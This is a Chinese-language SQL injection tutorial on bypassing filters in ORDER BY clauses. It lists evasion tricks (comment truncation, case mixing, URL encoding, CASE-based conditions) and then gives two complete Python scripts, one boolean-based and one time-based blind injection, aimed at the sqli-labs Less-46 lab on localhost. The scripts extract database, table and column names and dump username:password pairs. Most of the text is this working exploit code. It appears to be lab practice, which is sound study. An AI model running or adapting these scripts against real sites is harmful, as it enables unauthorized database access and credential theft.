绕过过滤order by
一、常见绕过技术
1、注释符截断
利用注释符(如 `--` 、`#` )截断后续查询,消除过滤逻辑的影响。
ORDER BY 1--
若原查询为 `SELECT * FROM table ORDER BY '用户输入'` ,注入后可能忽略后续过滤逻辑。
2、大小写混淆/编码绕过
若过滤是大小写敏感或未处理编码,可尝试:
- 大小写混合: `OrDeR By 1`
- URL编码: `%4F%52%44%45%52%20%42%59%201` (对应 `ORDER BY 1` )
3、嵌套查询或函数
利用数据库函数(如 `IF` 、`CASE` )或子查询构造条件逻辑。
ORDER BY (CASE WHEN (SELECT SUBSTR(version(),1,1)='5') THEN 1 ELSE 2 END)
二、实践
以sqlilabs的第46关为例
1、布尔盲注
import requests
from bs4 import BeautifulSoup
def get_content(resp):
    """Return the stripped text of the lab page's second result cell, or None if absent.

    The CSS selector is tied to the sqli-labs page layout; a different HTML
    structure makes this return None for every response.
    """
    page = BeautifulSoup(resp.text, 'html.parser')
    cell = page.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    if not cell:
        return None
    return cell.text.strip()
def binary_search_injection(base_url, sql_query_template, max_length=100):
    """Extract a string one character at a time from the lab target (boolean-based blind).

    Args:
        base_url: URL template with a ``{sql_query}`` placeholder (the lab's ``sort``
            parameter).
        sql_query_template: payload template with ``{index}`` (1-based character
            position) and ``{mid_char}`` (ASCII value being compared) placeholders.
        max_length: upper bound on the number of characters extracted.

    Returns:
        The extracted characters joined into a string. The result may be partial:
        extraction stops at the first request failure, at a non-printable/whitespace
        character, or after ``max_length`` characters.
    """
    result = []
    for i in range(1, max_length + 1):
        # Binary search over printable ASCII 32..127, so roughly 7 requests per
        # character -- each one carrying the payload in the query string, which is
        # the pattern a WAF or access-log review can key on.
        left, right = 32, 127
        while left <= right:
            mid = (left + right) // 2
            url = base_url.format(sql_query=sql_query_template.format(index=i, mid_char=mid))
            try:
                # NOTE(review): no timeout is passed, so a hung connection blocks forever.
                resp = requests.get(url)
                content = get_content(resp)
                # 'Dumb' is presumably the first row shown when the lab sorts by ``id``
                # (the payload picks ``id`` when ascii(char) > mid) -- verify against
                # the lab's data; any other first row is treated as "not greater".
                if content == 'Dumb':
                    left = mid + 1
                else:
                    right = mid - 1
            except Exception as e:
                # Abandons the search for this position; ``left`` is then used as-is,
                # so the returned string may contain a wrong character here.
                print(f"请求 {url} 失败: {e}")
                break
        # ``left`` converges on the character's ASCII value; an out-of-range value
        # (e.g. the probe never matched) is taken as end of string.
        if left > 127 or left < 32:
            break
        char_to_add = chr(left)
        if char_to_add.isspace():
            break
        result.append(char_to_add)
    return ''.join(result)
if __name__ == '__main__':
    # Lab-only target: sqli-labs Less-46 on localhost. The injection point is the
    # ``sort`` parameter; the trailing ``-- `` comments out the rest of the query.
    base_url = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort={sql_query} -- "
    # Each payload sorts by ``id`` when the probed character's ASCII value exceeds
    # ``mid_char`` and by ``username`` otherwise; binary_search_injection reads the
    # resulting change in the first row.
    database_query = "if(ascii(substr(database(),{index},1))>{mid_char},id,username)"
    table_query = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{mid_char},id,username)"
    column_query = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{mid_char},id,username)"
    data_query = "if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{mid_char},id,username)"
    # database name
    print(binary_search_injection(base_url, database_query))
    # table names
    print(binary_search_injection(base_url, table_query))
    # column names
    print(binary_search_injection(base_url, column_query))
    # usernames and passwords
    print(binary_search_injection(base_url, data_query))
实验结果:
2、时间盲注
import requests
import time
def inject_with_time(base_url, sql_query_template, delay=5, max_length=100):
    """Extract a string one character at a time from the lab target (time-based blind).

    Args:
        base_url: URL template with a ``{sql_query}`` placeholder.
        sql_query_template: payload template with ``{index}``, ``{mid_char}`` and
            ``{delay}`` placeholders.
        delay: seconds the payload is expected to stall the response when the
            probed condition is true; also the threshold used to classify responses.
        max_length: upper bound on the number of characters extracted.

    Returns:
        The extracted characters joined into a string; may be partial (see the
        stop conditions in the loop). The partial result is also printed after
        every character.
    """
    result = []
    for i in range(1, max_length + 1):
        # Binary search over printable ASCII 32..127, roughly 7 requests per
        # character; with delay=5 a "true" probe costs at least 5 s of wall time.
        left, right = 32, 127
        while left <= right:
            mid = (left + right) // 2
            query = sql_query_template.format(index=i, mid_char=mid, delay=delay)
            url = base_url.format(sql_query=query)
            start_time = time.time()
            try:
                # NOTE(review): no timeout is passed, so a hung connection blocks forever.
                resp = requests.get(url)
            except Exception as e:
                # Abandons the search for this position; ``left`` is used as-is.
                print(f"请求 {url} 失败: {e}")
                break
            # Wall-clock round trip is the only signal: network jitter above ``delay``
            # is misread as a "true" answer, which is why the result can be wrong.
            elapsed_time = time.time() - start_time
            if elapsed_time > delay:
                left = mid + 1
            else:
                right = mid - 1
            # Small pause between probes.
            time.sleep(0.1)
        # ``left`` converges on the character's ASCII value; out of range means end.
        if left > 127 or left < 32:
            break
        char_to_add = chr(left)
        if char_to_add.isspace():
            break
        result.append(char_to_add)
        # Progress output: print the partial result after each character.
        print(''.join(result))
    return ''.join(result)
if __name__ == '__main__':
    # Lab-only target: sqli-labs Less-46 on localhost, same ``sort`` injection point
    # as the boolean variant above; ``-- `` comments out the rest of the query.
    base_url = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort={sql_query} -- "
    # Each payload calls sleep({delay}) when the probed character's ASCII value
    # exceeds ``mid_char``; inject_with_time classifies responses by elapsed time.
    database_query = "if(ascii(substr(database(),{index},1))>{mid_char}, sleep({delay}), 0)"
    table_query = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{mid_char}, sleep({delay}), 0)"
    column_query = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{mid_char}, sleep({delay}), 0)"
    data_query = "if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{mid_char}, sleep({delay}), 0)"
    # Only the column-name extraction is enabled; the other calls are left
    # commented out because each one is slow (5 s per "true" probe).
    # print(inject_with_time(base_url, database_query, delay=5))
    # print(inject_with_time(base_url, table_query, delay=5))
    print(inject_with_time(base_url, column_query, delay=5))
    # print(inject_with_time(base_url, data_query, delay=5))
实验结果: